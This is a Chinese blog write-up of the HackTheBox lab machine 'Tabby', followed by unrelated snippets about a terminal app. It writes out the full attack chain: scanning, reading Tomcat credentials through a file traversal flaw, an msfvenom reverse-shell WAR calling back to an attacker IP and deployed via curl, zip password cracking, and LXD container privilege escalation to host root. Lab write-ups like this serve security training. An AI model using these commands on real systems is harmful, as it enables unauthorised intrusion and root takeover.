HackTheBox::Tabby

最新推荐文章于 2023-03-22 20:59:48 发布
最新推荐文章于 2023-03-22 20:59:48 发布
阅读量1.3k 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127487854
版权

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.194
image.png
nmap -Pn -p 22,80,8080 -sCV 10.10.10.194
image.png
80端口运行着web服务
image.png
对80和8080端口进行路径枚举,未发现敏感路径。
根据8080端口的tomcat可以进行登录,但未爆破出密码,根据目前的信息,猜测思路可能为通过没写服务或漏洞获得tomcat的账号密码,上传war包获得权限。
经过查找发现文件遍历漏洞:
image.png

0x01 漏洞利用

利用文件遍历漏洞查看tomcat的账号密码
image.png
得到密码:$3cureP4s5w0rd123!
由于该账号没有gui界面,所以需要采用另一种方式上传shell

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.29 LPORT=4444 -f war -o shell.war  //生成exp
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file shell.war "http://10.10.10.194:8080/manager/text/deploy?path=/shell.war"    //上传exp

image.png
image.png
经过查找发现一个备份文件
image.png
拷贝至本地进行打开
image.png
尝试密码爆破
image.png
得到密码admin@it
image.png

0x02 权限提升

image.png
image.png
https://www.hackingarticles.in/lxd-privilege-escalation/

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

image.png
image.png
将文件传输至靶机

lxc image import ./alpine-v3.14-x86_64-20210811_0145.tar.gz --alias myimage
lxc image list

image.png
上述步骤遇到一个坑,一直提示找不到目录或文件,执行一下lxc init,一切按默认选项即可。

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tabby 使用指南:跨平台Mac/linux/windows 替代putty, Xshell 一个高度可配置的现代化终端模拟器
weixin_42361393的博客
12-20 3640
Tabby 使用指南:一个高度可配置的现代化终端模拟器 Xpitz 0.493 2021.12.10 11:02:27 字数 838 阅读 961 文章首发于个人公号:「阿拉平平」 Tabby[1] 是一个基于 TypeScript 开发的终端模拟器,适用于 Windows,macOS 和 Linux。 该模拟器可高度配置,包括但不限于:主题、快捷键以及配色方案。本文将介绍 Tabby 的安装和使用方法。 下载安装 目前 Tabby 的最新版本为 1.0.164,可以到官网[2]、GitHub 或者公号后台
tabby:一个更现代的终端 for win
03-18
Tabby (前身是 Terminus) 是一个可高度配置的终端模拟器和 SSH 或串口客户端,支持 Windows,macOS 和 Linux 集成 SSH,Telnet 客户端和连接管理器 集成串行终端 定制主题和配色方案 完全可配置的快捷键和多键...
Tabby密码不能保存问题
djl的专栏,blog.djl.cx好记
03-22 970
Windows凭据中发现vscode把空间占满了,删除几个tabby就可以正常保存密码啦。Tabby的ssh连接不能保存密码, 设置后保存,点击连接还是要输入密码。开始菜单-->搜索进入控制面板-->凭据管理器。
Tabby Terminal 下载和安装,快速上手使用教程
Franciz777的博客
11-08 1万+
将默认的窗口拉宽即可显示出字体大小调节(笔者4K显示器下的默认界面是看不到字体调节的选项的)键入你的token即可正常使用,此时你需要保存token和gist以供不时之需.此设置有助于实现粘贴和复制终端内容,默认设置是右键粘贴会导致无法复制终端内容.默认的SFTP是不会识别当前工作目录的,若需要实现自动识别当前工作目录。若你已经以往可以在gitee的代码片段中查询和恢复历史记录。按下alt键即可实现区域选择,然后右键即可操作选中区域。可以在新建时选择分组和添加密码,最后保存即可。
windows远程linux工具之tabby的使用
weixin_42630613的博客
04-07 1万+
文章目录下载安装包连接linux本地文件上传下载服务器的文件到本地 下载安装包 双击打开tabby.exe 连接linux 经常要用的设备可以加入到tabby的设置里,操作如下: 此处的SSH connection位置可能有所差异 在Name对应位置输入该设备的名称,比如26服务器, Host输入服务器ip192.168.1.26, Username输入用户名ubuntu, 点击set password 输入密码,点击ok 点击save即可,如果重设密码,点forget,对密码进行重设。
SSH配置免密码登录后,仍需要输入密码——解决方案
热门推荐
xiaoyi357的博客
03-05 2万+
在配置SSH免密码登录的时候,发现配置完成后仍然需要输入密码查看网络资源,意识到是文件权限问题,但是按照网上的很多博客都不成功。后来发现了问题所在:不止authorized_keys需要修改文件权限,.ssh文件夹的权限也需要修改。而且,如果配置已经完成了,再回头修改文件权限似乎也不能成功。下面介绍可以成功实现免密码登录的操作步骤:           (注:操作系统为CentOS)
linux远程管理工具之tabby
此后如竟没有炬火,我便是唯一的光。
12-13 2万+
linux远程管理工具之tabbyTabby简介Tabby下载及安装PowerShell快捷键 Tabby简介 tabby是一款开源且免费的终端连接工具,可以使用于多平台,例如:windows,mac,linux等系统都支持 Tabby下载及安装 下载地址 // 这里我是在windos10上下载的,安装完成之后就会看到如下界面,点击setting进行连接 // 先点击profiles&connections,再点击new profile // 因为连接的是linux系统所以点击ssh这个选项
AI编码助手:Tabby
01-09
一个AI编码助手,旨在帮助开发人员更高效地编写代码。它可以提供代码建议、自动完成和错误检查,从而加速编码过程。Tabby是一项实验性的项目,旨在探索如何将人工智能引入软件开发工作流程中,以提高开发效率。
tabby:正确使用Vim标签
05-19
虎斑猫正确地跳动小费如果您喜欢Tabby并且想分享W00t !,我将感谢您提供的或。 修复了gt vs gT的非正交行为。 gt现在向前移动[count]个标签[count] (默认为1)(因此3gt向前移动3个标签页) gT保留其向后移动[count...
AI编码助手:tabby
最新发布
03-07
主要语言:Python 项目分类:[AI] 项目标签:[编程助手] [编码利器] 推荐理由:一个AI编码助手,旨在帮助开发人员更高效...Tabby是一项实验性的项目,旨在探索如何将人工智能引入软件开发工作流程中,以提高开发效率。
密码查看器(原名侠客密码查看器)
05-29
宽带密码查询 分级密码解除 中文版 破解
tabby:称为tabby的CAT(代码分析工具)
05-13
tabby TABBY is a Java Code Analysis Tool based on . It can parse JAR/WAR/CLASS files to CPG (Code Property Graph) based on . TABBY是一款针对Java语言的静态代码分析工具。 它使用静态分析框架 作为语义提取工具,将JAR/WAR/CLASS文件转化为代码属性图。 并使用 图数据库来存储生成的代码属性图CPG。 Note: 如果使用中存在什么问题,欢迎在提问! Note: Welcome to new a discussion at about TABBY! #1 使用方法 使用Tabby需要有以下环境: JDK8的环境 可用的Neo4j图数据库 Neo4j Browser 或者其他可以进行Neo4j可视化的工具 具体的使用方法参见: #2 Tabby的适用
支持网页版的SSH 工具-Tabby介绍.docx
11-06
支持网页版的SSH工具-Tabby介绍 Tabby是一个功能强大且易用的SSH工具,它提供了多平台支持、SFTP功能、炫酷的终端页面、插件支持等特性。下面是Tabby的详细介绍: 1. 多平台支持:Tabby提供了Windows、MacOS...
SSH介绍与神器Tabby
weixin_44211968的博客
01-06 1万+
本文介绍了什么是SSH、SSH的原理和使用。适合新手阅读。
拿到跳板机及账号密码后进行连接
Azoner的博客
10-09 826
ssh连接linux跳板机
一个宝藏开源软件,跨平台终端神器 Tabby
终码一生
02-14 3093
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! 自从在Win10上使用了Windows Terminal,对Windows下命令行终端一直挺满意的,直到最近发现了一个宝藏开源软件Tabby,才发现了更强大的存在。 简单对比一下Tabby.sh跟Windows Terminal的异同: 1、开源和跨平台性 二者均为开源软件,分别在以下地址开源: https://github.com/Eugeny/tabby https://github.co
演示ssh三种连接方式(密码 公钥 私钥)
hengge113的博客
08-16 1万+
ssh三种连接方式(密码 公钥 私钥)
简单使用tabby? (前端)
weixin_43677787的博客
10-09 1804
tabby将打包文件放到服务器上
mac 使用Tabby工具配置打包环境
rock_23的博客
02-22 680
Tabby是一个跨平台的终端(Terminal),支持Local,SSH,Telnet,Serial连接。平时用到最多的就是SSH,如果没有或很少有SS远程连接的需求,或者可以通过ssh命令行直连远程主机,日常完全可以用Windows Terminal。公司跳板机地址:http://xxx.xx.xxx.xxx:8080/ui/#/command。这个样子就完成了,剩下的命令就和在window上的xshell一样的命令使用了。然后我本来是基于官网上这样子的连接成功重新去配置了一个ssh。
selenium.common.exceptions.WebDriverException: Message: tab crashed
11-05
selenium.common.exceptions.WebDriverException: Message: tab crashed是指在使用selenium时,浏览器标签页崩溃导致的异常。这种情况可能是由于网站反爬虫机制导致的,也可能是由于浏览器版本与驱动版本不兼容导致的。解决方法可以尝试以下几种: 1.更新浏览器和驱动程序到最新版本。 2.尝试使用其他浏览器或驱动程序。 3.增加等待时间,让页面完全加载后再进行操作。 4.检查代码是否有错误,例如元素定位错误等。 5.尝试使用无头浏览器模式,可以减少浏览器崩溃的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值